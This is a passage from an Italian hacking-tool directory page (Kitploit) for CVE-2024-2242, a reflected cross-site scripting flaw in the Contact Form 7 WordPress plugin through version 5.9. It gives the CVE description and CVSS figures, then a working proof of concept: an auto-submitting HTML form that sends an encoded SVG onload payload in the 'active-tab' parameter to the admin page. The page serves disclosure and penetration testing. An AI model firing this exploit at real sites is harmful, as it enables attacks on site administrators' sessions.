Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-2242 — Contact Form 7 <= 5.9 - Cross-Site Scripting riflesso | Kitploit
Strumenti/GitHubGitHub/randomrobbiebf/cve-2024-2242
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubrandomrobbiebf/cve-2024-2242

CVE-2024-2242

Contact Form 7 <= 5.9 - Cross-Site Scripting riflesso

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-2242

Contact Form 7 <= 5.9 - Cross-Site Scripting riflesso

Descrizione

Il plugin Contact Form 7 per WordPress è vulnerabile a Cross-Site Scripting riflesso tramite il parametro 'active-tab' in tutte le versioni fino alla 5.9 inclusa, a causa di una sanitizzazione degli input e di un escaping dell'output insufficienti. Ciò consente ad attaccanti non autenticati di iniettare script web arbitrari nelle pagine che vengono eseguiti se riescono a convincere un utente a compiere un'azione come cliccare su un link.

root@kitploit:~
CVSS: 6.1
Impact: 2.7
Vector: network
User Interaction: required
Privileges Required: none
Published: 2024-03-13
Updated: 2024-03-13

POC

Devi conoscere il valore dell'ID del post su cui si trova il modulo, altrimenti quando l'amministratore clicca sul link non funzionerà. In generale, i privilegi richiesti dovrebbero essere H (High), poiché serve che un amministratore clicchi sul link.

root@kitploit:~
<html>

  <body>
    <form action="http://kubernetes.docker.internal/wp-admin/admin.php">
      <input type="hidden" name="page" value="wpcf7" />
      <input type="hidden" name="post" value="4478" />
      <input type="hidden" name="active&#45;tab" value="&apos;&quot;&gt;&lt;svg&#47;onload&#61;prompt&#40;7&#41;&#59;&gt;&#123;&#123;7&#42;7&#125;&#125;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
Scarica lo strumento